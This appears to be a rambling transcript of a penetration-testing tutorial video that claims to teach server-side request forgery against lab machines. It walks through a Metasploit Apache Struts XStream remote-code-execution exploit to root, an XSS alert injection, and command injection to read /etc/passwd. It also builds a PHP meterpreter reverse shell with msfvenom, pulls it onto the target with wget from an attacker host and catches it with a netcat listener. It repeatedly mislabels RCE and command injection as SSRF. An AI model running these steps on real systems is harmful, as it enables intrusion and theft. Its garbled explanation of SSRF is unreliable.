So guys, now we are going to discussing about server-side request forgery. So server-side request forgery is a common and critical vulnerability often targeted in bug bounty programs. It occurs when an attacker can manipulate a server-side application to make as unintended requests to internal or external system on behalf of the server. Now, what is SSRF in bug bounty? In bug bounty, SSRF is reported when a server accepts a user input like URL and user it make a request, allowing an attacker to access the internal sources and bypass the firewalls and access internal admin panels, databases, or APIs, and performs a port scans or internal services, leak sensitive informations, chain into a remote code execution in some misconfigured environments. Like commonly it will be occurred a file upload vulnerability we have already seen before, okay, like in the file inclusion and PDF generations and webhook callbacks. Like in webhook callbacks, like if you have like a targeted website, let's consider like a Binance.com, a login dot page. Once you log in, it will give to a Binance.com only. And when you try to click like a P2P, it will redirect it to call back to a subdomain and URL preview and cloud metadata access also can be done. Now, we would like to try to for this test, this SSRF attack. Let's come back here, come to your Linux mission. So I have hosted for two SSRF missions here. So one is with we would like to come back here. So one is with this one. Locally I have hosted this mission. Another one is this one. So first we would like to test this mission, then later we would like to jump into the over there. Now, we would like to try this as a 3, 4, 5. So we have orders is 3 orders. That's it here. Now, you can look here. Once you have look here, I have done the Nmap result. One it came with it was hosted with Apache Tomcat, Quite and JSP engine. Let's come back here. Then I even try with the direct buster. There is no useful information. Then I have tried with the Nikto. There is nothing else useful information. Now, I have utilizes this netsparker.com as a web vulnerability scanner and vulnerability missing of content type of the header. So, missing content type of the header. You can look here where it's like a snipping of the standard functionalities browser to find appropriate render data with HTTP header sent by the servers are either inconclusive or missing. Where you can look here. The problem arises once a website allows a user to upload a content which is then published on the web server. If attacker can carry out excess cross-site scripting, attacker can manipulate the content of the web and accept it by the web application or rendered as HTML by the browser. It is possible to inject a code like image file. We are already uploaded the reverseshell.php with an JPG or PNG images. We have tried all these things to upload as server-side request forgery. Then we would like to look here. Here, server-side request forgery allows an attacker to make a local or a remote network request or misbehave with the target of the server. Having like Equinix metadata API and go with SSRF may lead to an exposure of a sensitive information regarding of the vulnerabilities and attacker compromising it. Now, we would like to look here. Now, in the Metasploit tool, this targeted mission, like it's work with the struct REST stream. Let me just copy this one, come back. Now, we would like to open this MSF console. Let it open here. We can look here. We just need to try to type let it come. So this will take a little bit some time to come. Where you have got here exploit, which is with the Apache struct tool as a plugin with the Xstream with the remote code execution. It will also be applicable with the server-side request forgery also. I would like to prefer to take a Linux mission. There is a bulk and multiple things. If you take the first one, you will not get the exploited. Okay. If you want to take it based on your operating system, which one it is, so you just need to install web spider. Then once you have done this, okay, and if you have identified, I can look here, let's come back here, let me just type here as a clear, you just put here as a what web, then you just put here as HTTP, enter your target IP address 192.168.18.54. We would like to look here, it's with orders.html, it's with Apache, content and redirected with Apache equal to HTML server JavaScript. So it's maybe in Linux. So I would like to prefer to take it as a Linux. So just type here as use a file here. That's well and good. Now let's just type here as clear. Now just type here as show options. Now where we just put here as set our hostess and your target IP address 192.168.18.154. Set our port. So our port is 80 because we have got the nmap scan port 80 is running in the Apache server. Okay, now just type here as set SRV host, enter your same kernel Linux IP address 192. Now that's it. There is nothing else to change. Set a target URI is from here orders 3. So from here anything else you just need to put here apart from this. So you would like to try to put here is order 3, otherwise order 4. Choice is your wish, where you can get exploit everything here. Okay, now let's come back here. Now just try here as a type run here. Command stagger progress. We would like to look here. Exploit is completed but no session was created. We just need to look here. Set a payload for a Linux x64. Then I just put here as shell, as put here as a reverse TCP. That's it. Now just type here as run. We would like to look here. Why it's not going to execute it here? Let me just type it as clear. We would like to look here. Now I would like to try with x84. Now try to run here. Now command stagger is progress. So you need to change 64 to 86 where you have got it here. You just type your as ID. You have got entire of that machine access here of the server side request. So you just type your as root, just type +-L where you have got entire that profile. So whoever the profile is there and x defaults, everything is clear to get it from here. That's we have completed here. Now this is like a server side request forgery with a remote code execution. Now we would like to dive into the another thing. We would like to try here as one more thing. Let's come back here. We would like to try here as 153. Let's come back here. Just copy. Let me just type here as 153. We would like to look here. What's the results we can get here? What is the exact output we can see here? This also port is available with the HTTP 3. I mean Apache HTTP. That HTTP headers and HTTP titles and HTTP robots.txt is disallowed. Spark cap. This is MAC address where we have received all this information. Now, even if you want to try here with this as a, we can try here as 53. We can try. It's like 53. It's Apache's version. Country is reserved. Email. Okay. It's with the onion. Okay. This is a targeted IP. Java query and script. Title with the host name. Now I would like to put here as 53. We would like to run this. What is the directory? It's pages. Let me just open the pages. It's like basic grid.html, full width gallery.html, index.html, server side left, server side bar. So it's quite interesting things to look here. Let me just close here. Now, apart from where robots.txt, we would like to look this spark cap, just copy, come back here, just enter 153. Sorry. Uh, where this is like as a backup files. Okay, it's quite pretty good. Where the backup file, we don't require anything else from the backup. So better to try to let's I would like to try to just copy this. Now let me just type it as clear, just clear as wget 153. I would like to put here an time request. Just paste it. Now let's come back here, just copy, come back, and let's just paste this. Index dot back, where you just put here as cat index dot back, where in the index dot back you can look in the index dot back. So where we would like to look here, this is with the you need to study all these things as in the backup, in the templates, wrapper, images demo with the background with the 10.jpg. Okay, wrapper row, it's with the onion. You can look here index.php. That's it. We didn't get anything else. So in this case we didn't get anything else. Let me just type here as clear. Now we just try this directory stuff one more time. Where we would like to look here server side request forgery. Hello total, where we are getting here as a root somewhat a useful information with the targeted IP address. Your IP address is here. So quite interesting thing here we are getting here. Okay, now I would like to write here as a something. Let's go back here. Scroll down target here. I just put here as script. Just put here as alert. Then just put here as PCPL alerts. Then let's close the script tag. I just copy and just paste here. Try to submit. Where we have got here it's what it was executing here. This recipient acknowledged the following information regarding your submission. Date with a Monday, script with a PCPL Alex, and feedback where it was got here. Unique token. Our team will get back to you with the next step. Thank you for hosting. Okay, quite interesting thing here we are getting here. So now we would like to go back here. Oh, sorry, I'm back. Now let's we would like to look here as server side request forgery. So in this case, we would like to go here as server side request forgery. You can study all the server side request forgery. Let's prevention of the cheat sheet. Let's come back. Cheat sheet. We get this cheat sheet. Example patterns we are getting here. Test.ruby. Okay. So let's come back. That's it here. Server side request forgery. This is with the 8 on GitHub. No. Let's come back here. So we would like to look at this description. Addition. So we would like to look this as a Bible. So we are not getting this one. Let's just put here. Let's come back here. Here also we didn't get. So in a better way, let me server side request forgery OS. Let's just try this. Get open. So we didn't get in. Let's just try this. It's with let me just put here, and let me just put here as index.php. Yes, I will just so we need to search here, but it will take a too lengthy time process. So let me I just try to go back here. I would like to come back. Let me just write in this case first a similar type of exploit like let's just go here. CMD just put here as cat. I just put here as list minus L. I would like to give this one. That's quite interesting thing. Now let's come back here. In this case, you just put here as test. Let's just paste here. Now try to submit. Here you can look here receipt.php, receipt.shtml, robots.txt, spooker and ssi.html and token, where we have got here exactly with a simple command of exec. Now I would like to put here, let's come back here in the list minus L. I just put here as a etc as a password. Now try to look here. I didn't get anything else because I have write the command here equal to I just need to put here as cat etc equal to password. It also not even given to us. So I think I have made a mistake. Go back. CMD equal to cat etc and password. No, it not at giving the right thing here. So I would like to delete this. Delete this. Now let's come back here. Uh, here, you just need you have made a mistake here. Is cat as a etc password. That's it. Then let's come back to here. Now let's just start try this. Copy. Come back here. Let's just press where you can look here. It's with the root and all the data which was a display all here. We can look here. M is very clear. Now let's go back here. Now, what is your next to do something? Now, here you would like to look here. Where are you right now? Is like you just put here as a PWD. You can look here. You are in where www.html convert.me public.html where you can get here exactly the clear. Now, I would like to try to create with a simple exploit. Let me just write here as clear. We just put here as MSF Vera payload for a Linux. There, we just put here as x86. Just put here as meter Preta, then you just put here as a reverse underscore TCP. Then lpost equal to enter your target. Type it as 192.168.18.192. L4 equal to 7890. File type as I would like to get like ELF file. That's quite good. So we don't like to go for execution as this one. I would like to utilize only the PHP because it's a PHP. Then let me just put here as error. Then I just put here as shell.php. That's it. Now, we would like to look here where I have got a created this shell.php. And I just put here as cat a shell.php where we can look here our PHP reverse shell which is exactly here. Now, we would like to dive into other thing. So now we would like to try here, like first of all, we would like to go here, like how we would like to get here. Let me just go here as Python. I just type it as ls minus l Python minus m history without server. We would like to go here. In this case, command. Let's we just put here as let me just put here as wget http enter our target IP address 192.168.18.122. It's with 8000 shell.php. That's it. Enter. Just copy, go back. Now paste this, then try to submit. Where it was submitted, now we would like to look here, which is sent successfully as a shell.php. Our status code is 200, where it is available successfully. Now let's come back here, go back to here. In the same case, let's just copy. Now I just put here in this, I just put in the command list as a list. Okay, I just need to copy this one. Let's go back here again. In this case, let me just paste this. Try. Where you can look here, images, index.php, index.html, layout license.txt, receipt.php, shtml. Where we can look here, shell.php. Now, you just need to put here as a netcat listener with that. So, now we would like to go again. Go back with this. Yes, just here as exit. Now come back to the MSF console. Now from the beginning, we would like to try this. Exactly how we are going to utilizing this SSRF attack. Now just put here as use exploit multi handler. Now let's come back here. Now have set set a payload as a PHP metadata, then you just put here as a reverse underscore TCP. Then set payload. Okay, sorry, I just made a mistake. Now once you have done this, now just type here as show options. Now just type here as set lpost enter your target. Like it was 192.168.18.122. That's it. Then now we just put here as a exploit. Let's wait. It will run now in the background. Now it was started for a listening. Now we would like to try here. Yes. Now let's come back here. So we already know this one. I would like to look here one more time. List minus a. Then you try to submit here where you can look here shell.php. Okay, just copy this one. Now let's come back, close this. Now you just put here as a shell.php. So where it will try to connect here directly, but in our case it was not executed. But it was the wrong thing is because I have set up the port here is 4444. This is the main mistake. Let me just come back here. Let me just put here netcat minus lvnp 7890. That's it. Now let's go back here. Now you can look here. It was connected here. Where we have successfully get connected. It was disconnected automatically. Connect and disconnect. So where you can try to do the SSRF attack in this way, where we can find internal endpoints, leaked contents, and all everything. That's it here. So where you can enumerate after you have connected everything. That's it here. So this is how you can confirm and perform the SSRF attack. Now, later we would like to do here as source code disclosure vulnerability.